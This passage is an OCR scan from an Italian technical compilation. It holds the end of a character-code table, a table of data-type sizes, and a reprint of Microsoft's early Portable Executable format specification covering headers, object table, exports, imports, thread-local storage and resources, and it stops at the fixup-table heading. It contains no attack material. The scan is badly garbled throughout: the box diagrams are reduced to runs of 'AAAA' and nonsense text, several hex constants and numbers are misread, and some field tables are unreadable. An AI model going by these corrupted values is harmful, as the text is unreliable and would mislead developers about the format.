156* 9C 
157 9D 
158 9E 
159* 9F 
160 AO 
161 A1  - 
162 A2 Ss 
163 A3° tt 
164 A4 u 
165 A5 Vv 
166 A6  w 
167 A7 x 
168 A8  y 
169 A9 Z 
170 AA 
171 AB 
172 AC 
173 AD 
174 AE 
175 AF 
176 BO 
177 BI 
178 B2 
179 B3 
180  B4 
181 B5 
182 B6 
183 B7 
184 B8 
185  B9 
186 BA 
187 BB 
188 BC 
189 BD 
190 BE 
191 BF 
192 CO { 
dog «GL - «& 
194 C2 B 
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49° Ga 245 F5 5 
196 C4 D 246 F6 6 
197 C5 E Dan: (FD 
198 C6 F 248 F8 8 
io GU E 249 F9 9 
200  C8 H 250 FA 

201  C9 I 251 FB 

202 CA 252 FC 

208 CB 253 FD 

204 CC 254 FE 

205 CD 255 FF 

206 CE 

207 CF 

208 DO } 

209 DI J 

210  D2 K 

211  D3 L 

212 D4 M 

213 D5 N 

214 D6 0 

215  D7 P 

216 D8 Q 

217  D9 R 

218 DA 

219 DB 

220 DC 

D21 DD 

222 DE 

223 DF 

224 EQ  \ 

225 EI 

226 E2 S 

227 E3 T 

228 E4 UU 

229 E5 V 

230 E6  W 

231 E7 X 

232 E8  Y 

233 EQ Z 

234 EA 

235 EB 

236 EC 

237 ED 

238 EE 

239 EF 

240 FO 0 

DAL «Pi A 

apc FRE 2 

ZA3;. Fa 3 

244 F4 4 


TIPOLOGIA DATI 


Type Name Bytes Range of Values 

(signed) byte 1 -128 to 127 

unsigned byte 1 0 to 255 

(signed) short 2 -32,768 to 32,767 

unsigned short 2 0 to 65,535 

(signed) long 4 -2,147,483,648 to 2,147,483,647 
unsigned long 4 0 to 4,294, 967, 295 

float 4 3.4E +/- 38 

double 8 1.7E +/- 308 

long double 10 1.2E +/- 4932 


Pagina 463 di 991 


DOCUMENTI INTEGRALI 


Qui vengono riportati alcuni documenti integrali rilasciati da Microsoft o da 
altri. 
I testi sono 


PORTABLE EXECUTABLE FORMAT 
Win32 Binary Resource Formats 


PORTABLE EXECUTABLE FORMAT 


Author: Micheal J. 0'Leary 


Preface 


This document was edited and released by Microsoft Developer 
Support. It describes the binary portable executable format for NT. 
The information is provided at this point because we feel it will 
make the work of application development easier. Unfortunately, the 
information in this document may change before the final release of 
Windows NT. Microsoft is NOT committing to stay with these formats 
by releasing this document. Questions or follow-ups for any of the 
information presented here should be posted to CompuServe MSWIN32 
forum, section 6. 

--Steve Firebaugh 

Microsoft Developer Support 


Contents 

1. Overview 

2. PE Header 

3. Object Table 

4. Image Pages 

5. Exports 

Export Directory Table 
Export Address Table 
Export Name Table Pointers 


Export Ordinal Table 
Export Name Table 


(01010: 01 01] 
VSWNH 


6. Imports 
6.1 Import Directory Table 
6.2 Import Lookup Table 
6.3 Hint-Name Table 
6.4 Import Address Table 


7. Thread Local Storage 
7.1 Thread Local Storage Directory Table 
7.2 Thread Local Storage CallBack Table 


8. Resources 


8.1 Resource Directory Table 
8.2 Resource Example 
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9. Fixup Table 
9.1 Fixup Block 


10. Debug Information 
10.1 Debug Directory 


1. Overview 


UAAAAAAAAAAAAAAAAAAi <AAg <AAAAA Base of Image Header 
8 DOS 2 Compatible * si 

3 EXE Header ù 
AAAAAAAAAAAAAAAAALA" 
3 unused 3 
AAAAAAAAAAAAAAAAAAA" 
OEM Identifier 
OEM Info 

DOS 2.0 Section 
Offset to (for DOS compatibility only) 


PE Header 


3 DOS 2.0 Stub i 
3 Program & 3 
3 Reloc. Table 3 


W_WÙ W W W 
10 W W W W W W WG VW VW WGW W W 


- 


3 unused 5 

AAAAAAAAAAAAAAAAAAA"  <AAAAAAAAA Aligned on 8 byte boundary 

3 PE Header 3 

AAAAAAAAAAAAAAAAAAA" 

3 Object Table 9 

AAAAAAAAAAAAAAAAAAA" 

Image Pages 
import info 
export info 
fixup info 
resource info? 
debug info s 

AAAAAAAAAAAAAAAAAAAU 


3 3 
3 3 
3 3 
3 3 
3 
3 


Figure 1. A typical 32-bit Portable EXE File Layout 


2. PE Header 


UAAAAAAAAAAAAAAAAAAAAAARAAAKAAABAAARAAARAAARAAKAAARAAAAAAAAAAAA , 
x SIGNATURE BYTES 3 CPU TYPE 3 # OBJECTS 


TIME/DATE STAMP 5 RESERVED si 


RESERVED 3 LMAJOR3LMINOR8 RESERVED 3 


OBJECT ALIGN î FILE ALIGN s 
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THREAD LOCAL STORAGE RVA TOTAL TLS SIZE d 
AAAAAAAAAAAAARAAAAARAAAAAAAARAAAARAAAARAAAAAAAARAAAAARAAAAAAAAAÙL 


Figure 2. PE Header 
Notes: 


O A VA is a virtual address that is already biased by the Image 
Base found in the PE Header. A RVA is a virtual address that is 
relative to the Image Base. 


o An RVA in the PE Header which has a value of zero indicates the 
field isn't used. 


o Image pages are aligned and zero padded to a File Align 
boundary. The bases of all other tables and structures must be 
aligned on DWORD (4 byte) boundary. Thus, all VA's and RVA'S 
must be on a 32 bit boundary. All table and structure fields 
must be aligned on their "natural" boundaries, with the possible 
exception of the Debug Info. 


SIGNATURE BYTES = DB * 4. 
Current value is "PE/0/0". Thats PE followed by two zeros (nulls). 


CPU TYPE = DW CPU Type. 
This field specifies the type of CPU compatibility required by this 
image to run. The values are: 


o ©000h _ unknown 
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o 014Ch __ 80386 

o ©014Dh __80486 

o ©014Eh __ 80586 

o ©162h __MIPS Mark I (R2000, R3000) 
o ©163h __MIPS Mark II (R6000) 

o ©166h __MIPS Mark III (R4000) 


# OBJECTS = DW Number of object entries. 
This field specifies the number of entries in the Object Table. 


TIME/DATE STAMP = DD Used to store the time and date the file was 
created or modified by the linker. 


NT HDR SIZE = DW This is the number of remaining bytes in the NT 
header that follow the FLAGS field. 


FLAGS = DW Flag bits for the image. 
The flag bits have the following definitons: 


o 0000h __ Program image. 


o 0002h __Image is executable. 
If this bit isn't set, then it indicates that either errors 
where detected at link time or that the image is being 
incrementally linked and therefore can't be loaded. 


O ©200h Fixed. 
Indicates that if the image can't be loaded at the Image Base, 
then don't load it. 


o 2000h Library image. 
LMAJOR/LMINOR = DB Linker major/minor version number. 


ENTRYPOINT RVA = DD Entrypoint relative virtual address. 

The address is relative to the Image Base. The address is the 
starting address for program images and the library initialization 
and library termination address for library images. 


IMAGE BASE = DD The virtual base of the image. 
This will be the virtual address of the first byte of the file (Dos 
Header). This must be a multiple of 64K. 


OBJECT ALIGN = DD The alignment of the objects. This must be a power 
of 2 between 512 and 256M inclusive. The default is 64K. 


FILE ALIGN = DD Alignment factor used to align image pages. The 
alignment factor (in bytes) used to align the base of the image pages 
and to determine the granularity of per-object trailing zero pad. 
Larger alignment factors will cost more file space; smaller alignment 
factors will impact demand load performance, perhaps significantly. 
Of the two, wasting file space is preferable. This value should be a 
power of 2 between 512 and 64K inclusive. 


OS MAJOR/MINOR = DW 0S version number required to run this image. 


USER MAJOR/MINOR # = DW User major/minor version number. 
This is useful for differentiating between revisions of 
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images/dynamic linked libraries. The values are specified at link 
time by the user. 


SUBSYS MAJOR/MINOR # = DW Subsystem major/minor version number. 
IMAGE SIZE = DD The virtual size (in bytes) of the image. 
This includes all headers. The total image size must be a multiple 


of Object Align. 


HEADER SIZE = DD Total header size. 
The combined size of the Dos Header, PE Header and Object Table. 


FILE CHECKSUM = DD Checksum for entire file. Set to 0 by the linker. 


SUBSYSTEM = DW NT Subsystem required to run this image. 
The values are: 


o 0000h Unknown 

o 0001h Native 

o 0002h _ Windows GUI 

o 0003h _ Windows Character 
o 0005h __0S/2 Character 

o 0007h _ Posix Character 


DLL FLAGS = DW Indicates special loader requirements. 
This flag has the following bit values: 


o 0001h _Per-Process Library Initialization. 

oO 0002h _Per-Process Library Termination. 

O ©004h _ Per-Thread Library Initialization. 

o ©008h _ Per-Thread Library Termination. 
All other bits are reserved for future use and should be set to zero. 
STACK RESERVE SIZE = DD Stack size needed for image. 
The memory is reserved, but only the STACK COMMIT SIZE is committed. 
The next page of the stack is a 'guarded page'. When the application 
hits the guarded page, the guarded page becomes valid, and the next 
page becomes the guarded page. This continues until the RESERVE SIZE 
is reached. 
STACK COMMIT SIZE = DD Stack commit size. 
HEAP RESERVE SIZE = DD Size of local heap to reserve. 
HEAP COMMIT SIZE = DD Amount to commit in local heap. 


# INTERESTING VA/SIZES = DD Indicates the size of the VA/SIZE array 
that follows. 


EXPORT TABLE RVA = DD Relative Virtual Address of the Export Table. 
This address is relative to the Image Base. 


IMPORT TABLE RVA = DD Relative Virtual Address of the Import Table. 
This address is relative to the Image Base. 
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RESOURCE TABLE RVA = DD Relative Virtual Address of the Resource 
Table. This address is relative to the Image Base. 


EXCEPTION TABLE RVA = DD Relative Virtual Address of the Exception 
Table. This address is relative to the Image Base. 


SECURITY TABLE RVA = DD Relative Virtual Address of the Security 
Table. This address is relative to the Image Base. 


FIXUP TABLE RVA = DD Relative Virtual Address of the Fixup Table. 
This address is relative to the Image Base. 


DEBUG TABLE RVA = DD Relative Virtual Address of the Debug Table. 
This address is relative to the Image Base. 


IMAGE DESCRIPTION RVA = DD Relative Virtual Address of the 
description string specified in the module definiton file. 


MACHINE SPECIFIC RVA = DD Relative Virtual Address of a machine 
specific value. This address is relative to the Image Base. 


TOTAL EXPORT DATA SIZE = DD Total size of the export data. 

TOTAL IMPORT DATA SIZE = DD Total size of the import data. 

TOTAL RESOURCE DATA SIZE = DD Total size of the resource data. 
TOTAL EXCEPTION DATA SIZE = DD Total size of the exception data. 
TOTAL SECURITY DATA SIZE = DD Total size of the security data. 
TOTAL FIXUP DATA SIZE = DD Total size of the fixup data. 

TOTAL DEBUG DIRECTORIES = DD Total number of debug directories. 
TOTAL DESCRIPTION SIZE = DD Total size of the description data. 


MACHINE SPECIFIC SIZE = DD A machine specific value. 


3. Object Table 


The number of entries in the Object Table is given by the # Objects 
field in the PE Header. Entries in the Object Table are numbered 
starting from one. The object table immediately follows the PE 
Header. The code and data memory object entries are in the order 
chosen by the linker. The virtual addresses for objects must be 
assigned by the linker such that they are in ascending order and 
adjacent, and must be a multiple of Object Align in the PE header. 


Each Object Table entry has the following format: 


DAAAAAAAAAAAAAAAAAAAAAAARAAAAAAAARAAAAAAAAAAAAARAAAAAAAAAAAK 
UAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA è, 
OBJECT NAME 3 
AAAAAAAAAAAAAAAAAARAAAAAAAAAAAAARAAAAAAAAAAAAARAAAAAAAAAALA" 

VIRTUAL SIZE 3 RVA x 
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3 RESERVED 3 OBJECT FLAGS 3 
AAAAAAAAAAAAAAAAAAAAAAAAAARAAAARAAAARAAAAAAAAAAAAAAAAAAAARAÙL 


Figure 3. Object Table 


OBJECT NAME = DB * 8. Object name. This is an eight-byte null-padded 
ASCII string representing the object name. 


VIRTUAL SIZE = DD Virtual memory size. The size of the object that 
will be allocated when the object is loaded. Any difference between 
PHYSICAL SIZE and VIRTUAL SIZE is zero filled. 

RVA = DD Relative Virtual Address. The virtual address the object is 
currently relocated to, relative to the Image Base. Each Object's 
virtual address space consumes a multiple of Object Align (power of 2 
between 512 and 256M inclusive. Default is 64K), and immediately 
follows the previous Object in the virtual address space (the virtual 
address space for a image must be dense). 

PHYSICAL SIZE = DD Physical file size of initialized data. The size 
of the initialized data in the file for the object. The physical 
size must be a multiple of the File Align field in the PE Header, and 
must be less than or equal to the Virtual Size. 

PHYSICAL OFFSET = DD Physical offset for object's first page. This 
offset is relative to beginning of the EXE file, and is aligned on a 
multiple of the File Align field in the PE Header. The offset is 
used as a seek value. 


OBJECT FLAGS = DD Flag bits for the object. The object flag bits 
have the following definitions: 


o 000000020h _ Code object. 

o 000000040h __Initialized data object. 

o 000000080h _ _Uninitialized data object. 

o 040000000h __ Object must not be cached. 

o 080000000h _ Object is not pageable. 

O 100000000h __ Object is shared. 

o 200000000h __Executable object. 

o 400000000h _ Readable object. 

o 800000000h _ _Writeable object. 
All other bits are reserved for future use and should be set to zero. 
4. Image Pages 
The Image Pages section contains all initialized data for all 
objects. The seek offset for the first page in each object is 
specified in the object table and is aligned on a File Align 


boundary. The objects are ordered by the RVA. Every object begins 
on a multiple of Object Align. 


5. Exports 
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A typical file layout for the export information follows: 


: DIRECTORY TABLE _ © 
MAE LIE AS RARO, 
Dee NAME IIS 
ins DINE ST De e 
ate DEM SIEM o 
AAAAAAAAAAAAAAAAAAAAAAAAU 


Figure 4. Export File Layout 
5.1 Export Directory Table 


The export information begins with the Export Directory Table which 
describes the remainder of the export information. The Export 
Directory Table contains address information that is used to resolve 
fixup references to the entry points within this image. 


UAAAAAAAAAAAAAAAAKAAKAAAAAAAKAAKAAAAAAAA, 
oi OI 
Cengio ora ID At 
agi JOE VERSION, 7 s SMINOR VERSION O 
SRRORCI ARE REL LIL LL RAR, 
; CORDINAL.BooE. ; 


. PESTE ENTRIO>, . 
; EMIR ; 
; (RR Teo, _ 
; 2 GM ETE SP, . 


3 ORDINAL TABLE RVA È 


Figure 5. Export Directory Table Entry 

EXPORT FLAGS = DD Currently set to zero. 

TIME/DATE STAMP = DD Time/Date the export data was created. 
MAJOR/MINOR VERSION = DW A user settable major/minor version number. 


NAME RVA = DD Relative Virtual Address of the DIl asciiz Name. 
This is the address relative to the Image Base. 


ORDINAL BASE = DD First valid exported ordinal. 
This field specifies the starting ordinal number for the export 
address table for this image. Normally set to 1. 


# EAT ENTRIES = DD Indicates number of entries in the Export Address 
Table. 
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# NAME PTRS = DD This indicates the number of entries in the Name Ptr 
Table (and parallel Ordinal Table). 


ADDRESS TABLE RVA = DD Relative Virtual Address of the Export Address 
Table. 
This address is relative to the Image Base. 


NAME TABLE RVA = DD Relative Virtual Address of the Export Name Table 
Pointers. 

This address is relative to the beginning of the Image Base. This 
table is an array of RVA's with # NAMES entries. 


ORDINAL TABLE RVA = DD Relative Virtual Address of Export Ordinals 
Table Entry. 
This address is relative to the beginning of the Image Base. 


5.2 Export Address Table 


The Export Address Table contains the address of exported entrypoints 
and exported data and absolutes. An ordinal number is used to index 
the Export Address Table. The ORDINAL BASE must be subracted from the 
ordinal number before indexing into this table. 


Export Address Table entry formats are described below: 


UAAAAAAAAAAAAAAAAKAAAAAAAAAKAAAAAAAAAKg, 
3 EXPORTED RVA 5 
\ARAAAAAAARARAAARAARAAARAAAAAARRARAAU 


Figure 6. Export Address Table Entry 


EXPORTED RVA = DD Export address. 
This field contains the relative virtual address of the exported 
entry (relative to the Image Base). 


5.3 Export Name Table Pointers 


The export name table pointers array contains address into the Export 
Name Table. The pointers are 32-bits each, and are relative to the 
Image Base. The pointers are ordered lexically to allow binary 
searches. 


5.4 Export Ordinal Table 


The Export Name Table Pointers and the Export Ordinal Table form two 
parallel arrays, separated to allow natural field alignment. The 
export ordinal table array contains the Export Address Table ordinal 
numbers associated with the named export referenced by corresponding 
Export Name Table Pointers. 


The ordinals are 16-bits each, and already include the Ordinal Base 
stored in the Export Directory Table. 


5.5 Export Name Table 


The export name table contains optional ASCII names for exported 
entries in the image. These tables are used with the array of Export 
Name Table Pointers and the array of Export Ordinals to translate a 
procedure name string into an ordinal number by searching for a 
matching name string. The ordinal number is used to locate the entry 
point information in the export address table. 
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Import references by name require the Export Name Table Pointers 
table to be binary searched to find the matching name, then the 
corresponding Export Ordinal Table is known to contain the entry 
point ordinal number. Import references by ordinal number provide 
the fastest lookup since searching the name table is not required. 


Each name table entry has the following format: 


Figure 7. Export Name Table Entry 


ASCII STRING = DB ASCII String. 
The string is case sensitive and is terminated by a null byte. 


6. Imports 
A typical file layout for the import information follows: 


UAAAAAAAAAAAAAAAAKAAAAAAA &, 
3 DIRECTORY TABLE 


3 
3 
3 
3 


3 
3 
3 
Dip rcliiai taria ladini iii iaia 
ù NULL DIR ENTRY 3 
AARAAAARARRAKARRBARAAKARAÙ 


UAAAAAAAAAAAAAAAAAAAAAAA è, 
s DLL1 LOOKUP TABLE s 


“ HINT-NAME TABLE È 
AARAAAARARRARARRAKAAKARAÙU 


UAAAAAAAAAAAAAAAAAAAAAAAK &, 


3 DLL1 ADDRESS TABLE 
3 3 


FCR RA COREL CIRO E CARI ICT 
5 NULL 5 
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i IRINA RANA RATA RIDI 


UAAAAAAAAAAAAAAAAKAAKAAAAK &, 
o DLL2 ADDRESS TABLE 


3 3 
Dini ilaria i fia atua LIT 
3 NULL 3 


3 DLL3 ADDRESS TABLE 


3 3 
PERERRITOO RE RICER DE CTIRIETRT ARE: RETI POTRA) 
3 NULL 3 


iii AAAAAARAAÙ 
Figure 8. Import File Layout 
6.1 Import Directory Table 


The import information begins with the Import Directory Table which 
describes the remainder of the import information. The Import 
Directory Table contains address information that is used to resolve 
fixup references to the entry points within a DLL image. The import 
directory table consists of an array of Import Directory Entries, one 
entry for each DLL this image references. The last directory entry is 
empty (NULL) which indicates the end of the directory table. 


An Import Directory Entry has the following format: 


UAAAAAAARAAAAAAAAAKAAAAAAAAAKAAAAAAAAAK, 


3 IMPORT FLAGS 3 
salice Lia i ale i ii Marie ie ito 
S TIME/DATE STAMP 3 


Si STORE NOTO e MINOR VERSIONE 
RISE RE OE (SMETTA, 
sii ORTI OO E 
Sutri e IOSI DDR TS ie 
AAAAARAAAAAARKAAAAAAKAAAAARANARAAAKAU 


Figure 9. Import Directory Entry 
IMPORT FLAGS = DD Currently set to zero. 


TIME/DATE STAMP = DD Time/Date the import data was pre-snapped or 
zero if not pre-snapped. 


MAJOR/MINOR VERSION = DW The major/minor version number of the dll 
being referenced. 


NAME RVA = DD Relative Virtual Address of the DIl asciiz Name. 
This is the address relative to the Image Base. 


IMPORT LOOKUP TABLE RVA = DD This field contains the address of the 
start of the import lookup table for this image. The address is 
relative to the beginning of the Image Base. 


IMPORT ADDRESS TABLE RVA = DD This field contains the address of the 
start of the import addresses for this image. The address is 
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relative to the beginning of the Image Base. 
6.2 Import Lookup Table 
The Import Lookup Table is an array of ordinal or hint/name RVA's for 
each DLL. The last entry is empty (NULL) which indicates the end of 
the table. 
The last element is empty. 

3 (0) 

1 

UADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAK 

300 ORDINAL#/HINT-NAME TABLE RVA 3 

AADAAAAAAAAAAAAAAAAKAAAAAAAAAKAAAAKAKAU 
Figure 10. Import Address Table Format 
ORDINAL/HINT-NAME TABLE RVA = 31-bits (mask = 7fffffffh) Ordinal 
Number or Name Table RVA. 
If the import is by ordinal, this field contains a 31 bit ordinal 
number. If the import is by name, this field contains a 31 bit 
address relative to the Image Base to the Hint-Name Table. 
O = 1-bit (mask = 80000000h) Import by ordinal flag. 

o 00000000h __Import by name. 
o 80000000h __Import by ordinal. 

6.3 Hint-Name Table 
The Hint-Name Table format follows: 


UAAAAAAARAAAAAAAAAKAAAAAAAAAKAAAAAAAAAA, 


3 HINT 3 ASCII STRING |||? 
III]: N02, dPADO. 3 
AAAAAAAAAAAAAAAAAAAAAAARAAAAAAAAAAAAÙ 


The PAD field is optional. 
Figure 11. Import Hint-Name Table 
HINT = DW Hint into Export Name Table Pointers. 
The hint value is used to index the Export Name Table Pointers array, 
allowing faster by-name imports. If the hint is incorrect, then a 
binary search is performed on the Export Name Ptr Table. 


ASCII STRING = DB ASCII String. 
The string is case sensitive and is terminated by a null byte. 


PAD = DB Zero pad byte. 
A trailing zero pad byte appears after the trailing null byte if 
necessary to align the next entry on an even boundary. 


The loader overwrites the import address table when loading the image 
with the 32-bit address of the import. 


6.4 Import Address Table 
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The Import Address Table is an array of addresses of the imported 
routines for each DLL. The last entry is empty (NULL) which indicates 
the end of the table. 


7. Thread Local Storage 


Thread local storage is a special contiguous block of data. Each 
thread will gets its own block upon creation of the thread. 


The file layout for thread local storage follows: 
UAAAAAAAAAAAAAAAAAAAAAKA<, 
3 DIRECTORY TABLE 3 
AAAAAAAAAAAAAAAAAAAAAAAAU 
UAAAAAAAAAAAAAAAAAAAAAAA<, 
i TLS DATA 3 
AAAAAAAAAAAAAAAAAAAAAAAAU 
UAAAAAAAAAAAAAAAAAAAAAAA<, 
3 INDEX VARIABLE 3 
AAAAAAAAAAAAAAAAAAAAAAAAU 
UAAAAAAAAAAAAAAAAAAAAAAA<, 
3 CALLBACK ADDRESSES 3 
AAAAAAAAAAAAAAAAAAAAAAAAU 


Figure 12. Thread Local Storage Layout 
7.1 Thread Local Storage Directory Table 


The Thread Local Storage Directory Table contains address information 
that is used to describe the rest of TLS. 


The Thread Local Storage Directory Table has the following format: 


UAAAAAAARAAAAAAAAKAAAAAAAAAKAAAAAAAAAK, 


iti SISRR DS PEO O  o 
aio a END DSi i o 
dii Di 
2 CALLBACK TABLE VA 2 


AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAU 
Figure 13. Thread Local Storage Directory Table 


START DATA BLOCK VA = DD Virtual Address of the start of the thread 
local storage data block. 


END DATA BLOCK VA = DD Virtual Address of the end of the thread local 
storage data block. 


INDEX VA = DD Virtual Address of the index variable used to access 
the thread local storage data block. 


CALLBACK TABLE VA = DD Virtual Address of the callback table. 

7.2 Thread Local Storage CallBack Table 

The Thread Local Storage Callbacks is an array of Virtual Address of 
functions to be called by the loader after thread creation and thread 


termination. The last entry is empty (NULL) which indicates the end 
of the table. 
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The Thread Local Storage CallBack Table has the following format: 


MRARRARARRARARAARABRARASAAARAZARAARA 
_ FUNCTIONI VA 3 

SRTPRCIA E ORENRE IRA RR ENTE CA RETE RRE 
3 FUNCTION2 VA 3 


3 NULL S 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAU 


Figure 14. Thread Local Storage CallBack Table 

8. Resources 

Resources are indexed by a multiple level binary-sorted tree 
structure. The overall design can incorporate 2**31 levels, however, 


NT uses only three: the highest is TYPE, then NAME, then LANGUAGE. 


A typical file layout for the resource information follows: 
UAAAAAAAAAAAAAAAAAAAAAAA<, 


3 RESOURCE DIRECTORY 3 
3 3 
3 3 
3 3 
AAAAAAAAAAAAAAAAAAAAAAAA 
3 RESOURCE DATA 3 
3 3 
3 3 
3 3 
3 3 
3 3 
3 3 


AAAAAAAAAAAAAAAAAAAAAAAAU 


Figure 15. Resource File Layout 


The Resource directory is made up of the following tables: 


8.1 Resource Directory Table 
UAAAAAAAAAAAAAAAARAAAAAAAAAAAAAAAKAAA<, 


ì RESOURCE FLAGS 3 
ET AREE rv Si Die Se AREA IR IEEE] 
3 TIME/DATE STAMP A 


dardi pri ria dda pae 
3. MAJOR VERSION 3 MINOR VERSION 3 


3 # NAME ENTRY 3 # ID ENTRY 3 
REP PR ANA e NV PRA A RR 
3 RESOURCE DIR ENTRIES 6 


AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAU 


Figure 16. Resource Table Entry 


RESOURCE FLAGS = DD Currently set to zero. 


TIME/DATE STAMP = DD Time/Date the resource data was created by the 
resource compiler. 
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MAJOR/MINOR VERSION = DW A user settable major/minor version number. 


# NAME ENTRY = DW The number of name entries. 

This field contains the number of entries at the beginning of the 
array of directory entries which have actual string names associated 
with them. 


# ID ENTRY = DW The number of ID integer entries. 
This field contains the number of 32-bit integer IDs as their names 
in the array of directory entries. 


The resource directory is followed by a variable length array of 
directory entries. # NAME ENTRY is the number of entries at the 
beginning of the array that have actual names associated with each 
entry. The entires are in ascending order, case insensitive strings. 
# ID ENTRY identifies the number of entries that have 32-bit integer 
IDs as their name. These entries are also sorted in ascending order. 


This structure allows fast lookup by either name or number, but for 
any given resource entry only one form of lookup is supported, not 
both. This is consistent with the syntax of the .RC file and the .RES 
file. 


The array of directory entries have the following format: 
3 (0) 
1 
UAAAAAAAAAARAAAAAAAAAAAAAAAAAAAAAAAAKg, 
si NAME RVA/INTEGER ID 3 
AADAAAAAAKAAAAAAAAAAAAAAAAAAAAAAKAAAAA 
3EO DATA ENTRY RVA/SUBDIR RVA 3 
AADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAU 


Figure 17. Resource Directory Entry 


INTERGER ID = DD ID. 
This field contains a integer ID field to identify a resource. 


NAME RVA = DD Name RVA address. 
This field contains a 31-bit address relative to the beginning of the 
Image Base to a Resource Directory String Entry. 


E = 1-bit (mask 80000000h) Unescape bit. 
This bit is zero for unescaped Resource Data Entries. 


DATA RVA = 31-bits (mask 7fffffffh) Data entry address. 
This field contains a 31-bit address relative to the beginning of the 
Image Base to a Resource Data Entry. 


E = 1-bit (mask 80000000h) Escape bit. 
This bit is 1 for escaped Subdirectory Entry. 


DATA RVA = 31-bits (mask 7fffffffh) Directory entries. 


This field contains a 31-bit address relative to the beginning of the 
Image Base to Subdirectory Entry. 


Each resource directory string entry has the following format: 
UAAAAAAAAAARAAAAAAAAAAAAAAAAAAAAAAAAAK 
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x LENGTH 3 UNICODE STRING 3 


3 3 


Figure 18. Resource Directory String Entry 


LENGTH = DW Length of string. 

UNICODE STRING = DW UNICODE String. 

All of these string objects are stored together after the last 
resource directory entry and before the first resource data object. 
This minimizes the impact of these variable length objects on the 


alignment of the fixed size directory entry objects. The length needs 
to be word aligned. 


Each Resource Data Entry has the following format: 


UAAAAAAARAAAAAAAAAAAAAAAAAAKAAAAAAAAAA, 
3 


clic 
RT ERI COL RIONERO, 
. RESERO: - 


Figure 19. Resource Data Entry 


DATA RVA = DD Address of Resource Data. 
This field contains 32-bit virtaul address of the resource data 
(relative to the Image Base). 


SIZE = DD Size of Resource Data. 
This field contains the size of the resource data for this resource. 


CODEPAGE = DD Codepage. 

RESERVED = DD Reserved - must be zero. 

Each resource data entry describes a leaf node in the resource 
directory tree. It contains an address which is relative to the 
beginning of Image Base, a size field that gives the number of bytes 
of data at that address, a CodePage that should be used when decoding 


code point values within the resource data. Typically for new 
applications the code page would be the unicode code page. 


8.2 Resource Example 


The following is an example for an app. which wants to use the following data 
as resources: 


Typeld# NameId# Language ID Resource Data 
00000001 00000001 (0) 00010001 
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00000001 00000001 1 10010001 
00000001 00000002 (0) 00010002 
00000001 00000003 (0) 00010003 
00000002 00000001 (0) 00020001 
00000002 00000002 (0) 00020002 
00000002 00000003 (0) 00020003 
00000002 00000004 (0) 00020004 
00000009 00000001 (0) 00090001 
00000009 00000009 (0) 00090009 
00000009 00000009 1 10090009 
00000009 00000009 2 20090009 
Then the Resource Directory in the Portable format looks like: 
Offse Data 
0000: 00000000 00000000 00000000 00030000 (3 entries in this directory) 
0010: 00000001 80000028 (Typeld #1, Subdirectory at offset 0x28) 
0018: 00000002 80000050 (Typeld #2, Subdirectory at offset 0x50) 
0020: 00000009 80000080 (Typeld #9, Subdirectory at offset 0x80) 
0028: 00000000 00000000 00000000 00030000 (3 entries in this directory) 
0038: 00000001 800000A0 (NameId #1, Subdirectory at offset OxA0) 
0040: 00000002 00000108 (NameId #2, data desc at offset 0x108) 
0048: 00000003 00000118 (NameId #3, data desc at offset 0x118) 
0050: 00000000 00000000 00000000 00040000 (4 entries in this directory) 
0060: 00000001 00000128 (NameId #1, data desc at offset 0x128) 
0068: 00000002 00000138 (NameId #2, data desc at offset 0x138) 
0070: 00000003 00000148 (NameId #3, data desc at offset 0x148) 
0078: 00000004 00000158 (NameId #4, data desc at offset 0x158) 
0080: 00000000 00000000 00000000 00020000 (2 entries in this directory) 
0090: 00000001 00000168 (NameId #1, data desc at offset 0x168) 
0098: 00000009 800000CO (NameId #9, Subdirectory at offset ©OxC0) 
00A0: 00000000 00000000 00000000 00020000 (2 entries in this directory) 
00BO: 00000000 000000E8 (Language ID 0, data desc at offset 0xE8 
00B8: 00000001 000000F8 (Language ID 1, data desc at offset 0xF8 
00CO: 00000000 00000000 00000000 00030000 (3 entries in this directory) 
00DO: 00000001 00000178 (Language ID 0, data desc at offset 0x178 
00D8: 00000001 00000188 (Language ID 1, data desc at offset 0x188 
00EO: 00000001 00000198 (Language ID 2, data desc at offset 0x198 
00E8: 000001A8 (At offset 0x1A8, for Typeld #1, NameId #1, Language id #0 
00000004 (4 bytes of data) 
00000000 (codepage) 
00000000 (reserved) 
00F8: 000001AC (At offset Ox1AC, for Typeld #1, NameId #1, Language id #1 
00000004 (4 bytes of data) 
00000000 (codepage) 
00000000 (reserved) 
0108: 000001B0 (At offset 0x1B0, for Typeld #1, NameId #2, 
00000004 (4 bytes of data) 
00000000  (codepage) 
00000000 (reserved) 
0118: 000001B4 (At offset 0x1B4, for Typeld #1, NameId #3, 
00000004 (4 bytes of data) 
00000000 (codepage) 
00000000 (reserved) 
0128: 000001B8 (At offset 0x1B8, for Typeld #2, NameId #1, 
00000004 (4 bytes of data) 
00000000 (codepage) 
00000000 (reserved) 
0138: 000001BC (At offset 0x1BC, for Typeld #2, NameId #2, 
00000004 (4 bytes of data) 
00000000 (codepage) 
00000000 (reserved) 
0148: 000001C0 (At offset 0x1C0, for Typeld #2, NameId #3, 
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00000004 (4 bytes of data) 
00000000 (codepage) 
00000000 (reserved) 
0158: 000001C4 (At offset 0x1C4, for Typeld #2, NameId #4, 
00000004 (4 bytes of data) 
00000000  (codepage) 
00000000 (reserved) 
0168: 000001C8 (At offset 0x1C8, for Typeld #9, NameId #1, 
00000004 (4 bytes of data) 
00000000 (codepage) 
00000000 (reserved) 
0178: 000001CC (At offset 0x1CC, for Typeld #9, NameId #9, Language id #0 
00000004 (4 bytes of data) 
00000000 (codepage) 
00000000 (reserved) 
0188: 000001DO (At offset 0x1D0O, for Typeld #9, NameId #9, Language id #1 
00000004 (4 bytes of data) 
00000000 (codepage) 
00000000 (reserved) 
0198: 000001D4 (At offset 0x1D4, for Typeld #9, NameId #9, Language id #2 
00000004 (4 bytes of data) 
00000000 (codepage) 
00000000 (reserved) 
And the data for the resources will look like: 
01A8: 00010001 
O1AC: 10010001 
01BO: 00010002 
01B4: 00010003 
01B8: 00020001 
01BC: 00020002 
01C0: 00020003 
01C4: 00020004 
01C8: 00090001 
01CC: 00090009 
01DO: 10090009 
01D4: 20090009 


9. Fixup Table 

